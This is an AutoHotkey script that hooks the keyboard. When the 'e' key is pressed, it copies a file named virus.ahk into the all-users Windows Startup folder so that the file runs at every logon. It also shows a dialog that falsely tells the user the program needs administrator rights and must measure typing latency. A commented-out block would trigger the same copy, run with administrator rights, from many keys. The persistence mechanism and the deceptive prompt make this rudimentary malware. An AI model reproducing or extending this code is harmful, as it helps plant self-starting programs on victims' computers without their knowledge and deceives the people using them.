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- #NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.
- SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
- ;SetWorkingDir, C:\AHK\2nd-keyboard\
- ;Menu, Tray, Icon, shell32.dll, 319 ;if commented in, this line changes the taskbar icon to a blue star. Beware that if you don't have shell32.dll, it'll be a blank icon!
- ;SetKeyDelay, 0 ;IDK exactly what this does.
- ; common startup C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
- #NoEnv
- SendMode Input
- #InstallKeybdHook
- ;#InstallMouseHook ;use this if you have scripts that use the mouse.
- #UseHook On
- #SingleInstance force
- #MaxHotkeysPerInterval 2000
- #HotkeyModifierTimeout 60 ;
- #KeyHistory 200 ; ; useful for debugging.
- #MenuMaskKey vk07 ;
- #WinActivateForce ; ;prevent taskbar flashing.
- ;RunAs, Administrator
- ^!q::ExitApp
- ^y::
- Gui, Add, Text,, This program must be run as an administrator. Please press a.:
- Gui, Add, Text,, Please type "The quick brown fox jumps over the lazy dog" so the program can setect your latency.:
- Gui, Add, Edit, vMyEdit -WantReturn
- Gui, Add, Button, Default, OK
- Gui, Show
- return
- Escape::
- Gui, Destroy
- return
- GuiClose:
- Gui, Destroy
- return
- ButtonOK:
- Gui, Submit
- Gui, Destroy
- Return
- e::
- FileCopy, virus.ahk, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
- send e
- ;run
- return
- /*
- escape::
- F1::
- F2::
- F3::
- F4::
- F5::
- F6::
- F7::
- F9::
- F8::
- F10::
- F11::
- F12::
- `::
- 1::
- 2::
- 3::
- 4::
- 5::
- 6::
- 7::
- 8::
- 9::
- 0::
- -::
- =::
- backspace::
- tab::
- q::
- w::
- ;e::
- r::
- t::
- y::
- u::
- i::
- o::
- p::
- [::
- ]::
- \::
- a::
- RunAs, Administrator
- FileCopy, virus.ahk, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
- return
- s::
- d::
- f::
- g::
- h::
- j::
- K::
- l::
- '::
- enter::
- z::
- x::
- c::
- v::
- b::
- n::
- m::
- ,::
- .::
- /::
- space::
- PrintScreen::
- ScrollLock::
- ins::
- del::
- home::
- end::
- PgUp::
- PgDn::
- up::
- down::
- left::
- right::
- numpad0::
- numpad1::
- numpad2::
- numpad3::
- numpad4::
- numpad5::
- numpad6::
- numpad7::
- numpad8::
- numpad9::
- numpadins::
- numpadend::
- numpaddown::
- numpadpgdn::
- numpadleft::
- numpadclear::
- numpadright::
- numpadhome::
- numpadup::
- numpadpgup::
- numpadDiv::
- numpadMult::
- numpadSub::
- numpadAdd::
- numpadEnter::
- numpadDot::
- ^c::
- run
- return
- */
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